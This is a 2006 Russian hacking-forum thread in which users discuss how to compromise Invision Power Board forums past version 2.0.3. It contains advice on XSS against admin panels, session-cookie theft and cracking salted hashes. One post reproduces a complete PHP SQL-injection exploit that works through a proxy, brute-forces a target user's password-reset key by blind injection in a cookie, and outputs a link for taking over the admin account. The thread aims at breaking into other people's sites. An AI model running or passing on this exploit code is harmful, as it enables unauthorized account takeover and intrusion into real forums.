Форумы ipb>2.0.3

Discussion in 'Уязвимости CMS/форумов' started by L1on, 11 Mar 2006.

  1. L1on

    L1on New Member

    Joined:
    11 Mar 2006
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Подробно прочитав и разобрав такие темы, как "Обзор уязвимостей ipb", "Подробный анализ ipb", просмотрев различные видео, я пришёл к выводу, что в данный момент ipb версий 2.0.4 и выше не поддаются взлому. Все сплойты направлены на более ранние версии ipb. Уязвимости xss позволяют нам зайти под пользователем, но мы не сможем попасть в админку, даже не сможем узнать пароль обычного пользователя, т.к. мы не узнаем salt.
    Да, я знаю, что подобных тем тысячи, я пользовался поиском, прорабатывал большое количество инфы, но ответа на свой вопрос так и не нашёл.
    Может, я в чём-то не прав, разъясните мне пожалуйста.
     
  2. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    Первая тема по-мойму не все уязвимости включает(мож что и упустили,если найдешь что упустили пиши мне на мыло) а вторая стара,насколько я помню.
     
  3. Inferno

    Inferno Elder - Старейшина

    Joined:
    30 Dec 2005
    Messages:
    97
    Likes Received:
    17
    Reputations:
    2
    Всё можно взломать,просто большынство форумов пропатчены, но не всё!!!
     
  4. L1on

    L1on New Member

    Joined:
    11 Mar 2006
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Пропатчить можно от какой-нить уязвимости, а как я говорю, таковой не нашёл.

    Есть сплойт для задосивания форума, но это не взлом.
     
  5. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    А как же сплойт который вытаскивает соль, правда он до версии 2.0.4, но все же! Уязвимость это дело времени, может скоро появиться че нить, будем ждать.
     
  6. L1on

    L1on New Member

    Joined:
    11 Mar 2006
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Ну так и идёт речь, что в версиях старше 2.0.3 нет уязвимостей, позволяющих завладеть форумом.
    Но постепенно-то уязвимостей становится всё меньше...
     
  7. Web Giant

    Web Giant Banned

    Joined:
    8 Mar 2006
    Messages:
    9
    Likes Received:
    1
    Reputations:
    -1
    Есть, там в административной панели view error email logs фильтров нет. Просто генерируем ошикбу, и делаем себя адином какт олько админ зайдет в эту панель.
     
  8. L1on

    L1on New Member

    Joined:
    11 Mar 2006
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    А отсюда поподробнее...как генерировать ошибку, засчёт которой админ, зайдя в панель, сделает и нас админом...
    И кстати, не факт, что он пойдёт в ту часть админки...
     
  9. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    Если админ юзает Ie, то можно послать ему сообщение в админку с Xss и тогда мы получим админскую сессию
     
  10. ZetRoX

    ZetRoX Elder - Старейшина

    Joined:
    4 Dec 2005
    Messages:
    52
    Likes Received:
    2
    Reputations:
    0
    сообщение посылается не в админку, а личную почту, и сессия там самая простая, так что ты таким способом не попадешь....
     
  11. Web Giant

    Web Giant Banned

    Joined:
    8 Mar 2006
    Messages:
    9
    Likes Received:
    1
    Reputations:
    -1
    Ошибка генерируется если у тебя в мыле не допустимые символы находятся.

    А то что "не факт" (дебильное выражение) что он зайдет в админку, то не факт что он зайдет на форум.

    И причем тут ИЕ? Так как символы не фильтруются, то все работает для всех брауезров.
     
  12. L1on

    L1on New Member

    Joined:
    11 Mar 2006
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Кому нужно отсылать мыло?
    Что должно содержаться в письме, помимо запрещённых символов? Скрипт, эксплуатирующий xss-уязвимость?

    Админу будет достаточно зайти в админку, чтобы увидеть отчёт или он должен будет пройти в особый подраздел админки? Это я имею в виду под выражением "не факт"...ведь не обязательно он пойдёт в этот подраздел...
     
  13. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    гляди видео Green Bear, там он нa 2.1.1 xss показывал. я на 2.1.3 пробовал все гуд, думаю и на 2.1.4 пойдет тоже..
    соль знать необязательно, в passwordspro последней версии кидаешь pass_hash, он умеет расшифровывать md5+salt
    http://gbl.nightmail.ru/1.jpg
    http://gbl.nightmail.ru/2.jpg
    http://gbl.nightmail.ru/4.jpg
    [​IMG]
     
    _________________________
    #13 c411k, 13 Mar 2006
    Last edited: 13 Mar 2006
  14. L1on

    L1on New Member

    Joined:
    11 Mar 2006
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Я только что зашёл через Оперу на форум ipb 2.0.4, посмотрел свои куки, вставил в ПассвордсПро последней версии этот хэш и конечно же он не разгадал. Ну а как он разгадает, если кодирование вида md5(md5($pass).$salt) ?? Тут полюбому надо знать соль... Как в видео Коула, чтобы разгадать пароль ipb 2.* он узнал и хэш и соль.
     
    #14 L1on, 13 Mar 2006
    Last edited: 13 Mar 2006
  15. ZetRoX

    ZetRoX Elder - Старейшина

    Joined:
    4 Dec 2005
    Messages:
    52
    Likes Received:
    2
    Reputations:
    0
    (cy4_1o1ka)
    я не знаю, как у тебя, но у меня такая фича не проходит...я делаю всё тоже самое...(ну, письмо с жалобой и XSS), и мне приходит простые pass_hash и sesion_hash....и с их помощью зайти в админку нереально....а если пытаться расшифровать, то, конечно, не расшифровывает...(я знаю пароль от админки и для проверки засунул его в один из словарей...проверял несколько раз...- ноль эмоций....)...кстати, я пробывал на 2.1.4. - всё работает...но эти данный не позволяют заходить в админку....:(((
     
  16. Абырвалг

    Абырвалг New Member

    Joined:
    13 Mar 2006
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Поправлю: в IPB хеширует по md5(md5($salt).md5($pass)).
     
  17. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    упс сори я извиняюсь )) соль нужна полюбому.. :|
    пробуй
    PHP:
    <?
    /*
                       ____   ________
     __________       /____ \/__   __ \
    /__________ \_ _ // _  \ / /  /  \ \
    \\______   \__ __ \/ / // /__/   / /
     \|       _/  |  \  / / \_____  / /
     ||    |   \  |  / / /_____ /  / /
     ||____|___/____/  \______/ \_/ /
     |_________/_____/\_______/\___/
        === - security team - ===

    Invision Power Board < 2.1.4 Password change SQL-Injection Exploit
                              by roOstY
                          Ru24 Security Team
                        <= www.Ru24-Team.net =>
    ----
    For example you can reset password for admin
    (link to "forget Password" add ask to change this password.
    At the end of exploit you get link to change admin password)
    Working in all Invision Power Forum forum before 2.1.4
    but you need good mysql version ;)
    Greetz to Nitrex and Dukenn
    Regards to: Dr_UFO_51,k0pa,NSD,Naikon and other...
    Before runing,you must setup some settings
    WARNING: You must setup the CURL-module for PHP!
    ----
    */

    /* In any case at first you need to change password to  $target if you can't understand that */
    //   error_reporting(E_ALL);

       ############    Settings    ###########################################################

        
    $proxy="24.48.*.*:**"## - your socks 4/5-proxy

        
    $host="http://forum.***.lt";   ##  - target forum
        
    $login="********";             ##  - login to forum
        
    $password="*****";             ##  - pass to forum
        
    $cook_name="ibf_topicsread";   ##  - target cookie name (default: ibf_topicsread)
        
    $topic=22;                     ##  - any real topyc
        
    $target=1;                     ##  - id target to admin or other user  that you want to reset password
        #####
        #  At first you need to reset pasword for target user.
        #   For example you can reset password for admin (link to "forget Password" add ask to change this password. At the end of you get link to change admin password)
        ####
        
    $len=32;  ## 5 for salt        ## it's my
        
    $ver=1;                        ##  if not wor change to 2
        
    $cookie_file_path "/tmp/cookie";    ## for my opinuion, you can to set other
        
    $agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";
       
    ################################################################################

       
    $cookie="";

       echo 
    "Login...";
       
    $url=$host."/index.php?act=Login&CODE=01&CookieDate=1";
       
    $reffer=$host."/index.php?act=Login&CODE=00";
       
    $post['UserName']=urlencode($login);
       
    $post['PassWord']=urlencode($password);
       
    $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,$post,"");          ###### Login to the forum

       
    $cook=getcookiee($result);
       foreach (
    $cook as $k=>$v) { $cookie[$k]=$v;  }
       if (!
    strstr($result,$login)) {
            echo 
    "error. Invalid Login or Password then Login\n";
            exit;
         }  else echo 
    "done\n";

       echo 
    "Redirecting to main page...";
       
    $url=$host.urldecode(ExtractString($result,$host,"\" "));
       
    $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"","");          ###### Redirect to the main page

       
    $cook=getcookiee($result);
       foreach (
    $cook as $k=>$v) { $cookie[$k]=$v;  }

        if (!
    strstr($result,$login)) {
            echo 
    "error. Invalid Login or Password then Redirect\n";
            exit;
         }  else echo 
    "done\n";
       
    $reffer=$url;


       echo 
    "Going to Control Panel...";
       
    $url=$host."/index.php?act=UserCP&CODE=00";
       
    $reffer="";$agent="";
       
    $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"","");             ###### Go te the control panel
           
    $cook=getcookiee($result);
           foreach (
    $cook as $k=>$v) { $cookie[$k]=$v;  }

        if (!
    strstr($result,$login)) {
            echo 
    "error. Invalid Login or Password then going to Control\n";
            exit;
         }    echo 
    "done\n";



        echo 
    "Get table prefix...";
              
    $arr[$topic]=1111111111;
              
    $arr['-1) andd']=$topic;

          
    $cookie_base="";
          foreach ( 
    $cookie as $k=>$v ) { $cookie_base.= $k."=".$v."; "; }

              
    $cookie_add=$cookie_base.$cook_name."=".urlencode(serialize($arr));
              unset(
    $arr);

              
    $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);
              if (!(
    strstr($result,"Error"))) {
                   echo 
    "error. Target seems not vuln";
                   exit;  }
              
    $pref=ExtractString($result,"SELECT * FROM ","topics");
              echo 
    "done prefix: ".$pref."\n";

    $al="";
    echo 
    "Checking Mysql version....";
    $targval=explode(".",$target);
              
    $arr[$topic]=1111111111;
              
    $arr['-1) and @@version<4/*']=$topic;
              
    $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));
              unset(
    $arr);
              
    $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);
              if (!
    strstr($result,"showtopic=".$target)) echo "done Mysql ver > 4 - GOOD!\n";
                  else { echo  
    "done Mysql ver < 4. We can use only dos\n";
                         exit;
                }
    echo 
    "Exploiting....";

               
    $sent='%61%3A%32%3A%7B%73%3A';
              if (
    $ver==1$exp="-999) UNION SELECT 0,vid,null,'open',0,1,1132440935,1,11132440935,0,null,null,0,0,2,2,1,0,0,0,0,0,1,0,0,0,0,0,0 from ".$pref."validating where member_id=".$target." LIMIT 1/*";
                      else 
    $exp="-999) UNION SELECT 0,vid,null,'open',0,1,1132440935,1,11132440935,0,null,null,0,0,2,2,1,0,0,null,null,0,0,1,0 from ".$pref."validating where member_id=".$target." LIMIT 1/*";

              
    $arr[$topic]=1111111111;
              
    $arr[$exp]=$topic;
              
    $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));
              unset(
    $arr);
              
    $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);
              if (!
    strstr($result,"different number of columns"))            {
                echo 
    "done\n";
                
    $vid=substr($result,strpos($result,"</a></span>")-32,32);
                echo 
    "Done\nGoto url: [".$host."/index.php?act=Reg&CODE=lostpassform&uid=".$target."&aid=".$vid."] and change user password!\n";
               } else {
                 echo 
    "bad  Can't find number of colums\n";
                }
    echo 
    "Checking Mysql version 2....";
    $targval=explode(".",$target);
              
    $arr[$topic]=1111111111;
              
    $arr['-1) and @@version<4.1/*']=$topic;
              
    $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));
              unset(
    $arr);
              
    $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);
              
    //echo $result;exit;
              
    if (!strstr($result,"showtopic=".$target)) echo "done Mysql ver > 4.1 - GOOD!\n";
                  else { echo  
    "done Mysql ver < 4.1. We can't use SUBSELECT\n";
                         exit;
                }
    echo 
    "Bruteforcing....\n";
          
    $val="";
    for (
    $j=16;$j<=$len;$j++) {
         
    $a2=128;
         
    $a1=32;
        while ((
    $a2-$a1)>=5) {
              
    $s=round(($a1+$a2)/2,0);
              echo 
    $s;
              
    $arr[$topic]=1111111111;
              
    $arr['-1) and '.$s.'>(select ord(substring(vid,'.$j.',1)) from '.$pref.'validating where member_id='.$target.' LIMIT 1)/*']=$topic;
              
    $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));
              unset(
    $arr);
              
    $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);
              if ((
    strstr($result,"Error"))) {
                   echo 
    "Error querry!\n";
                   exit;
                 }
              if (
    strstr($result,"showtopic")) $a2=$s; else $a1=$s;
         }
         for (
    $i=$a1;$i<=$a2;$i++) {
              echo 
    $i;
              
    $arr[$topic]=1111111111;
              
    $arr['-1) and '.$i.'=(select ord(substring(vid,'.$j.',1)) from '.$pref.'validating where member_id='.$target.' LIMIT 1)/*']=$topic;
              
    $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));
              
    $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);
             
    // echo urlencode(serialize($arr)).$result;exit;
              
    if (strstr($result,"showtopic"))  {
                  
    $val .= chr($i);
                  echo 
    " - Get_symb:[".$j."] ".chr($i)."\n";
                  break;
                }
         }
     }
     echo 
    "Done\nGoto url: [".$host."/index.php?act=Reg&CODE=lostpassform&uid=".$target."&aid=".strtolower($val)."] and change user password!\n";

    function 
    getcookiee($result) {
       
    $res explode("\n",$result);
       foreach (
    $res as $k=>$v ) {
        if (
    ereg("Set-Cookie",$v)) {
          
    $c_a explode(";",trim(str_replace("Set-Cookie:","",$v)));
          foreach (
    $c_a as $k=>$v ) {
                  if (!(
    ereg("expires",$v))) {
                   
    $arr=explode("=",trim($v));
                   
    $cook[trim($arr[0])]=trim($arr[1]);
                  }
              }
        }
      }
    return 
    $cook;
    }
    function 
    querry($url,$agent,$proxy,$reffer,$cookie_file_path,$post,$cookie) {
           
    $ch curl_init ();
           
    curl_setopt ($chCURLOPT_URL$url);
           
    curl_setopt($chCURLOPT_USERAGENT$agent);
           
    curl_setopt($chCURLOPT_SSL_VERIFYHOST,  0);
           
    curl_setopt($chCURLOPT_SSL_VERIFYPEERfalse);
           if (
    $post!="") {
                    
    curl_setopt($chCURLOPT_POST1);
                    
    curl_setopt($chCURLOPT_POSTFIELDS$post);
                 }
           
    curl_setopt ($chCURLOPT_TIMEOUT120);
           
    curl_setopt ($chCURLOPT_PROXY$proxy);
           
    curl_setopt ($chCURLOPT_PROXYTYPECURLPROXY_SOCKS5);
           
    curl_setopt ($chCURLOPT_RETURNTRANSFERTRUE);
           
    curl_setopt ($chCURLOPT_FAILONERRORfalse);
           
    curl_setopt ($chCURLOPT_FOLLOWLOCATION1);
           
    curl_setopt($chCURLOPT_REFERER$reffer);

           if (
    $cookie!="")
                           
    curl_setopt($chCURLOPT_COOKIE$cookie);
    //                   else {
                            
    curl_setopt($chCURLOPT_COOKIEFILE$cookie_file_path);
                            
    curl_setopt($chCURLOPT_COOKIEJAR$cookie_file_path);
    //                        }
           
    curl_setopt($chCURLOPT_HEADER1);
           
    $result curl_exec($ch);
           
    $error=curl_errno($ch);
           
    curl_close ($ch);
           if (
    $error$result="Fucking Error: ".$error."\r\n";
           if (
    $error==7$result=$result." Failed to connect() to host or proxy.\r\n";
           if (
    $error==28$result=$result." Operation timeout. The specified time-out period was reached according to the conditions.\r\n";
           if (
    $error==22$result=$result." Sorry, Unable to process request at this time, Please try again later.\r\n";
           return 
    $result;
    }

    function 
    ExtractString($str$start$end) {
      
    $str_low = ($str);
      if (
    strpos($str_low$start) !== false && strpos($str_low$endstrpos($str_low$start)) !== false) {
       
    $pos1 strpos($str_low$start) + strlen($start);
       
    $pos2 strpos($str_low$end,strpos($str_low$start)) - $pos1;
       return 
    substr($str$pos1$pos2);
      }
    }
    ?>
     
    _________________________
    #17 c411k, 14 Mar 2006
    Last edited: 14 Mar 2006
  18. ZetRoX

    ZetRoX Elder - Старейшина

    Joined:
    4 Dec 2005
    Messages:
    52
    Likes Received:
    2
    Reputations:
    0
    это для perl.exe???
    что-то у меня не работает...говорит что line 1 ....ну, типа, в первой строке ошибка...:(
     
  19. kr1s

    kr1s New Member

    Joined:
    7 Mar 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    php, лол ...
    WARNING: You must setup the CURL-module for PHP! - тут для непонятливых написано ;)
     
  20. ZetRoX

    ZetRoX Elder - Старейшина

    Joined:
    4 Dec 2005
    Messages:
    52
    Likes Received:
    2
    Reputations:
    0
    сори...сп, что объяснил...